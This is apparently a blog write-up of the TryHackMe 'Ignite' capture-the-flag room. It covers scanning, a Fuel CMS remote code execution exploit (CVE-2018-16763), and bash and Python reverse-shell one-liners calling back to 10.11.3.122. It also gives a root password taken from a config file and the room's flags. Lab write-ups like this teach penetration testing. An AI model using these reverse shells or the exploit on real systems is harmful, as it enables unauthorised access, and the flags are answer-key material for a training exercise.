thm-ignite-nl

Description: A new start-up has a few issues with their web server.

Free room , Difficulty: Easy

https://tryhackme.com/room/ignite


Nmap

>:sudo nmap -sC -sV 'machine-ip'

This is the scan method I use most of the time. With -sC it loads some standard nmap scripts and with -sV it shows the version of every service located at the open ports. My results were:

Nmap scan result

Open port is 80 HTTP. The website itself contains a content management system (CMS) named fuel.

GoBuster

To further enumerate the machine I want to scan it for any, maybe some hidden, directories. For this I’m using GoBuster with the machine IP address and the wordlist with commonly used directory names:

>:gobuster dir -u http://'machine-ip' -w /usr/share/dirb/wordlists/common.txt

GoBuster scan result

A lot of directories! Went through all of there and one useful result was “/fuel” as we saw in the nikto scan result above and it turns out to be a login page.

Login page of fuelCMS

Because CMS tend to have a lot of weak points so let’s have a look, if there is an exploit for Fuel CMS on “exploit-db”.

Search result on exploit-db

One result with the number CVE-2018-16763 we’re able to use a Remote Code Execution against the CMS. I downloaded it and entered my own IP address. Then I marked it as executable and executed it. My output contained errors and mostly because of the proxy. To make the exploit work I had to comment out the proxy entries otherwise to get rid of the errors. Now the exploit script should look like this

https://github.com/puckiestyle/python/blob/master/fuelcms141rce.py

Entering the command whoami then got me the output www-data.

Command execution

Down are still some errors but we got our desired output on the top.

Privilege Escalation

Because I am now able to execute commands I entered the code for a reverse shell. But to catch any output we have to set up a netcat listener:

>:nc -lnvp 443

Now we can enter our reverse shell code(bash or python choose what ya like) .

>:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.3.122 443 >/tmp/f
>:python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.3.122",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

And then stabilized my current shell with:

>:python -c 'import pty; pty.spawn("/bin/bash")'

Note: I found out, that using the su command later on needs a terminal. So stabilizing the shell is very important to get to the solution.

Then I cat the “user.txt” file (*1). Searched for backups because those tend to contain valuable informations:

>:find / -type f -name "*.bak" 2>/dev/null

With the 2>/dev/null at the end I get rid of all the files I don’t have the permissions for it.

After looking around , I found the password for root: /var/www/html/fuel/application/config/database.php.

password

root: mememe

Okay so we just found the password for the root user and now we can change our account user to root using su command.

root-shell-1

After this you can just get the root flag from /root.

Summary

1. User.txt
– 6470e394cbf6dab6a91682cc8585059b

2. Root.txt
– b9bbcb33e11b80be759c4e844862482d

Author : Puckiestyle

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *